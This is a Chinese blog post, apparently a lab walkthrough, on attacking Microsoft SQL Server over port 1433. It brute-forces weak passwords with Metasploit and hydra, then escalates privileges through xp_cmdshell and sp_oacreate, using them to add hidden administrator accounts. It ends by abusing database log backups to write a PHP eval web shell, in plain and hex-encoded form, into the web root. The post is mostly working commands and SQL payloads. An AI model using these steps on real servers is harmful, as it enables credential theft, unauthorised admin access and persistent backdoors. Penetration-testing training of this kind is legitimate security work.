sql1433端口msf、hydra弱口令爆破，获得了sql-server的权限，通过几种方式能够提权

最新推荐文章于 2024-11-26 13:46:39 发布

晓目

最新推荐文章于 2024-11-26 13:46:39 发布

阅读量4.3k

点赞数 3

文章标签：服务器运维 sql

本文链接：https://blog.csdn.net/weixin_64655821/article/details/126629940

版权

如果得到了1433端口，进行弱口令爆破，百度下1433端口，弱口令爆破的方式，kali 中msf hydra弱口令爆破

第一种：kali 中msf

查看sql-server默认端口1433

sql-server靶机ip 用户名和密码文档在root目录下

利用msf 爆破1433端口：192.168.102.129

(1)use auxiliary/scanner/mssql/mssql_login

(2)set RHOSTS 192.168.102.129

(3)set USER_FILE /root/user.txt

(4)set PASS_FILE /root/password.txt

(5)run
爆破出sa用户名密码为123456

hydra弱口令爆破

hydra语法

# hydra \[\[\[-l LOGIN|-L FILE\] \[-p PASS|-P FILE\]\] | \[-C FILE\]\] \[-e ns\]\[-o FILE\] \[-t TASKS\] \[-M FILE \[-T TASKS\]\] \[-w TIME\] \[-f\] \[-s PORT\] \[-S\] \[-vV\]server service \[OPT\]
-R 根据上一次进度继续破解-S 使用SSL协议连接-s 指定端口-l 指定用户名-L 指定用户名字典(文件)-p 指定密码破解-P 指定密码字典(文件)-e 空密码探测和指定用户密码探测(ns)-M <FILE>指定目标列表文件一行一条-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。-C 用户名可以用:分割(username:password)可以代替-l username -p password-o <FILE>输出文件-t 指定多线程数量，默认为16个线程-w TIME 设置最大超时的时间，单位秒，默认是30s-vV 显示详细过程server 目标IP
service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)

hydra -L /root/user.txt -P /root/password.txt 192.168.102.129 mssql -vv

成功爆破弱密码

[1433][mssql] host: 192.168.102.129 login: sa password: 123456

总结获得弱口令，获得了sql-server的权限，通过几种方式能够提权。

使用xp_cmdshell进行提权

xp_cmdshell提权

xp_cmdshell 提权原理：利用这个存储过程，执行系统的shell命令

利用xp-cmdshell 执行net user /add

提权：看上去很容易实际：需要满足以下条件很少能满足

1、xp_confifigure设置两个 show advanced options，xp_cmdshell 设置为1

2、执行net user add 设置服务的本地用户

use master;
RECONFIGURE;
exec sp_configure 'show advanced options',1;
RECONFIGURE;
exec sp_configure 'xp_cmdshell',1;
RECONFIGURE;
exec xp_cmdshell 'mkdir c:\myfile',no_output

执行cmd执行系统命令

exec xp_cmdshell 'whoami'
exec xp_cmdshell 'net user'
exec xp_cmdshell 'net user hacker 123456 /add'
exec xp_cmdshell 'net localgroup Administrators hacker /add'

hacker用户成功登录

--关闭扩展存储过程xp_cmdshell
EXEC sp_configure 'show advanced options','1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',0
RECONFIGURE
EXEC sp_configure 'show advanced options','0'
RECONFIGURE

使用sp_oacreate进行提权

-- 打开配置

exec sp_configure 'show advanced options',1;
reconfigure with override;
exec sp_configure 'Ole Automation Procedures',1;
reconfigure with override;

declare @shellx int
exec sp_oacreate 'wscript.shell',@shellx output
exec sp_oamethod @shellx,'run',null,'net user oahacker 123456 /ADD'
exec sp_oamethod @shellx,'run',null,'net localgroup Administrators oahacker /ADD'
exec sp_oamethod @shellx,'run',null,'c:\windows\system32\cmd.exe /c mkdir c:\temp\ddddddd'

成功创建指定路径dddddd文件夹

远程连接成功登录oahacker用户

-- 关闭配置
exec sp_configure 'show advanced options',1;
reconfigure with override;
exec sp_configure 'Ole Automation Procedures',0;
reconfigure with override;

Sql server的数据备份渗透备份提权

-- 渗透备份
1、插入文本马
alter database tt set recovery full;
use tt;
backup database tt to disk='C:\temp\ttbak.bak' with init;
create table cmd(a varchar(50));
backup log tt to disk='C:\temp\text.php' with init;
insert into cmd(a) values('<?php @eval($_POST["caidao"]); ?>');
select * from cmd;
backup log tt to disk='C:\WWW\textma.php';

成功插入在textma.php中，使用txt文本格式打开

win7菜刀连接

成功连接

2 、插入图片马

create table cmding(a image);
backup log tt to disk= 'C:\temp\image.php' with init;
insert into cmding values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e);
select * from cmding;
backup log tt to disk='C:\WWW\imagema.php';